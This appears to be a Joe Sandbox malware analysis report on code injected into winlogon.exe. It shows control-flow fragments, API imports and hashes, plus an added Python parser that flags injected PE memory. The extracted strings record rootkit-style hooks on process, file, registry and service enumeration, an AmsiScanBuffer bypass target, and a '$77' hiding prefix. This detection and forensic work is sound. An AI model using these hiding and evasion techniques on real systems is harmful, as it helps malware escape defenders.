2e991751cc0 440->449 450 2e991753099-2e9917530a6 lstrlenW 440->450 441->440 448 2e99175306a-2e991753077 441->448 452 2e991752f9d-2e991752fa2 443->452 453 
2e991753027-2e99175302c 443->453 456 2e991752fcf-2e991752fd5 444->456 459 2e991752ffe-2e99175300d call 2e991751cf8 446->459 460 2e99175300f-2e991753021 call 2e991753d4c 446->460 447->446 447->453 458 2e99175307a-2e991753080 448->458 449->450 468 2e9917530ca-2e9917530d5 449->468 454 2e9917530b9-2e9917530c3 call 2e991753d4c 450->454 455 2e9917530a8-2e9917530b7 call 2e991751cf8 450->455 452->435 452->443 463 2e9917530c6-2e9917530c8 453->463 454->463 455->454 455->468 456->453 466 2e991752fd7-2e991752fdc 456->466 458->468 469 2e991753082-2e991753087 458->469 459->453 459->460 460->453 460->463 463->428 463->468 466->437 466->456 474 2e991753140-2e991753144 468->474 475 2e9917530d7-2e9917530f7 call 2e991763800 468->475 469->440 469->458 474->428 479 2e99175311a-2e99175311d 475->479 480 2e9917530f9-2e991753117 call 2e991763800 475->480 479->474 481 2e99175311f-2e99175313d call 2e991763800 479->481 480->479 481->474
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 3153948470-3850299575
• Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
• Instruction ID: aaed27ad3e305524e6bf0e175972d3d8431492384e3f66a1df6f92d166f47a2e
• Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
• Instruction Fuzzy Hash: 07A19F62350AD682EB548F27D5487A9B3A5FB44B84F46501BEE09937A6EF35CCC0CB60
APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
• Instruction ID: 49dbb66c2b9d08f11e75c7ce488d5b0359c5f29976c97b303069a1c251fc4d82
• Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
• Instruction Fuzzy Hash: 24313072255BC18AEB608F62E8483DD7365F784784F45442ADA4D47B96DF38C588CB20
APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
• Instruction ID: 3903b66847189b81d25889496bb1b8e383e89abdb9bddb358c778eef8b30106a
• Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
• Instruction Fuzzy Hash: D5418132254FC186EB60CF26E84839E73A4F788798F55011AEA9D47B9ADF38C595CF10
APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:
• API String ID: 1164774033-0
• Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
• Instruction ID: 4b76ce216d5a720690b999f1a742873dfb43fe5f478b7fcddcaa06eaebb73a72
• Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
• Instruction Fuzzy Hash: 25A108227A46C249FB20DB77D4483AE6BA1F341B94F15411FDE9927A97DB34C5C2CB20

Control-flow Graph

APIs
• GetCurrentThread.KERNEL32 ref: 000002E991751E43
  • Part of subcall function 000002E9917521BC: GetModuleHandleA.KERNEL32(?,?,?,000002E991751E75), ref: 000002E9917521D4
  • Part of subcall function 000002E9917521BC: GetProcAddress.KERNEL32(?,?,?,000002E991751E75), ref: 000002E9917521E5
  • Part of subcall function 000002E991756030: GetCurrentThreadId.KERNEL32 ref: 000002E99175606B
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
• API String ID: 4175298099-4225371247
• Opcode ID: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
• Instruction ID: f25b5edf6e60a0457debf3e42918aa10f4baba1afb095c8d07ecb395f2ac7e99
• Opcode Fuzzy Hash: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
• Instruction Fuzzy Hash: D1419165280ACBE1FA00EFABE849BD53361B741384FC2101F951942177EF7986CACBB1

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
• Instruction ID: a21735339a83803276167e153e51cbe862e2234e7c2802a6256c20460b92f265
• Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
• Instruction Fuzzy Hash: D0515772250BC586EB14CF66E84C35AB7A1F788FD9F45412ADA4A47719DF38C089CB11

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Running Time
• API String ID: 1943346504-1805530042
• Opcode ID: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
• Instruction ID: 26c4faaa4f3ce01e82b28a09432c89a9dc3644eafea14ce8a27424f04b1c5be6
• Opcode Fuzzy Hash: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
• Instruction Fuzzy Hash: DA31B422744ED297E710DF57E80C759A3A0F788BC4F46412AAE4D87A36DF38C595CB20
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Utilization Percentage
• API String ID: 1943346504-3507739905
• Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
• Instruction ID: 2fe1cf3d04e074c441edd5dde03c5288aa455e060e5a0f5a48144b0a6b3f2ebe
• Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
• Instruction Fuzzy Hash: 3C318D22B50B8286E714DF23E88C75967A0B785FC4F46412A9E4A83736DF38C4958B20
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
• Instruction ID: 99738dc6357cb142af592c2e85b7234606a2382aa0657ef06e5351e5cfa35674
• Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
• Instruction Fuzzy Hash: D2D1A032645BD28AEB60DF66D4483AD37A0F749788F19091BEE8957B97CB34C0D2CB10
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: 7f5f0e6e2f7c5f7e2bbc1121a54cb1d16b76c198a6e1fef34f263735e65b24fa
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: 6AD1AF326447C68AEB60DF66D4483AD7BA0F745798F12412BEE8957B97DB38C4C1CB10
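The Memory Dump Source lines above are the security-relevant part of these records: the function was recovered from a dump of winlogon.exe (process 7 in this report) at 0x2E991751000 with protection 0x20 and memory type 0x20000, marked "based on PE: true", and its associated regions sit at section-sized offsets (0x2E991750000, ...765000, ...770000, ...772000, ...779000) with protections 0x02 and 0x04. Read as the Win32 constants they are, that is a PAGE_EXECUTE_READ region of MEM_PRIVATE memory holding a PE image: a module that was written into the process rather than mapped from a file, which is what the report's injection and "system process connects to network" signatures describe. The parser below is an added example, not Joe Sandbox code. The field layout of the .sdmp name is an assumption inferred from the records on this page; the PAGE_* and MEM_* values are the documented Win32 constants; the sample input is the block of dump lines copied from the record above.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Win32 memory constants (documented values from <winnt.h>).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # any PAGE_EXECUTE* bit
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout of a Joe Sandbox dump name, inferred from the records on this page:
#   <process no.>.<dump kind>.<dump id>.<base>.<protection>.<state>.<memory type>.<reserved>.sdmp
_SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<kind>[0-9A-F]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<memtype>[0-9A-F]{8})\.(?P<reserved>[0-9A-F]{8})\.sdmp",
    re.IGNORECASE,
)
_OFFSET_RE = re.compile(r"Offset:\s*([0-9A-F]+)", re.IGNORECASE)
_PE_RE = re.compile(r"based on PE:\s*(true|false)", re.IGNORECASE)


@dataclass
class DumpRegion:
    name: str
    proc: int                            # report process number (7 = winlogon.exe here), not the OS PID
    kind: int                            # 2 or 3 in these records; taken as the dump pass (assumption)
    base: int                            # start of the dumped region
    protect: int                         # PAGE_* value of the region
    memtype: int                         # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    image_base: Optional[int] = None     # "Offset:" of the Source File line, if present
    based_on_pe: Optional[bool] = None   # "based on PE:" of the Source File line, if present


def parse_dump_line(line: str) -> DumpRegion:
    """Parse one "Source File:" or "Associated:" bullet of a Memory Dump Source block."""
    m = _SDMP_RE.search(line)
    if m is None:
        raise ValueError(f"no Joe Sandbox dump name in: {line!r}")
    off = _OFFSET_RE.search(line)
    pe = _PE_RE.search(line)
    return DumpRegion(
        name=m.group(0),
        proc=int(m.group("proc"), 16),
        kind=int(m.group("kind"), 16),
        base=int(m.group("base"), 16),
        protect=int(m.group("protect"), 16),
        memtype=int(m.group("memtype"), 16),
        image_base=int(off.group(1), 16) if off else None,
        based_on_pe=(pe.group(1).lower() == "true") if pe else None,
    )


def parse_record(lines: Iterable[str]) -> List[DumpRegion]:
    """Collect the dump regions listed in one record; every other line is ignored."""
    regions = []
    for raw in lines:
        text = raw.strip().lstrip("•").strip()
        if text.startswith(("Source File:", "Associated:")):
            regions.append(parse_dump_line(text))
    return regions


def is_executable(region: DumpRegion) -> bool:
    return bool(region.protect & EXECUTE_MASK)


def injection_candidates(regions: Iterable[DumpRegion]) -> List[dict]:
    """Executable memory that is MEM_PRIVATE (not backed by a file mapping) yet holds
    a PE is the footprint of a manually mapped or reflectively loaded image."""
    found = []
    for r in regions:
        if is_executable(r) and r.memtype == 0x20000:
            found.append({
                "base": hex(r.base),
                "protect": PAGE_PROTECT.get(r.protect & 0xFF, hex(r.protect)),
                "memtype": MEM_TYPE[r.memtype],
                "image_base": hex(r.image_base) if r.image_base is not None else None,
                "based_on_pe": r.based_on_pe,
            })
    return found


# The Memory Dump Source block of the winlogon.exe record above, copied from the report.
SAMPLE_RECORD = [
    "• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true",
    "• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp",
    "• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp",
    "• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp",
    "• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp",
    "• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for candidate in injection_candidates(parse_record(SAMPLE_RECORD)):
        print(candidate)
```

The executable region starts exactly 0x1000 past the "Offset:" image base, i.e. the first section of a PE whose header page (0x2E991750000, read-only) and data page (0x2E991770000, read-write) are the associated dumps. Only the section with an execute bit is reported; the rest of the image is kept as context so the same header-plus-sections shape can be recognised in other records.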
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
• Instruction ID: b7e04b60139c7d9e1316f27439313651d5628575c8092bab553becf2a616c01f
• Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
• Instruction Fuzzy Hash: F2417F73214BC1C6E760CF62E44839E77A1F388BD9F45812ADA8A47B58DF38C489CB50
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$77childproc
• API String ID: 166002920-421986751
• Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
• Instruction ID: 10c4e4dba2aab4db695b4f74eb9ce6d446c2c32995884b7c1c0fae9a5a836e03
• Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
• Instruction Fuzzy Hash: 93115B32658B8183F710CB22F51C35A77A0F789BE4F54421AEA9942BA9CF3CC188CF51
APIs
Memory Dump Source
• Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
• Instruction ID: 4dd976a96d43247806e85808ac1010a0056d0ca12bf8b4a20d912f5fd0c13860
• Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
• Instruction Fuzzy Hash: 388104216822C356FB659B27E94935922D1BB96780F974C1FAE0447397DB38C9C78F30
APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
• Instruction ID: 909f26f8926b652a5c15e8097695c496ecfcc18c9513092cf61358467725ba22
• Opcode Fuzzy Hash: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
• Instruction Fuzzy Hash: 9181E321A807C396FB509B67D84D3A966D5BB45BC4F97441F9A08837A3DB38C9C68F30
APIs
• LoadLibraryExW.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E9917598F1
• GetLastError.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E9917598FF
• LoadLibraryExW.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E991759929
• FreeLibrary.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E991759997
• GetProcAddress.KERNEL32(?,?,?,000002E991759A2B,?,?,?,000002E99175921C,?,?,?,?,000002E991758D25), ref: 000002E9917599A3
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
• Instruction ID: 9f320c6c9fff93789a1df6739fe6a4e416d32357ddd2b4e66e4cac8dea9e2173
• Opcode Fuzzy Hash: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
• Instruction Fuzzy Hash: 5131A3313927C391EE159B17D8087A523A4BB85BA0F5B062EED1D87796EF38C4C4CB20
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
• Instruction ID: d59b2a43610fecd3e97e0f158529c9dcbd61d0c63d723f229aba9aba4167f800
• Opcode Fuzzy Hash: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
• Instruction Fuzzy Hash: 5E11BF31354A8187E7508B57F85C71963A4F789FE4F06022AEA1EC7B95CF38C984CB61
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: $77
• API String ID: 756756679-3904844309
• Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
• Instruction ID: fa77e6a11ed273225c10749b094a6a13fcf0baf6d162c6ec7fbad8676a10dd66
• Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
• Instruction Fuzzy Hash: 30318026741B9283EA16DF57E54C7396BA0FB44BC4F0A402A8F4947B66EF34C4E18B20
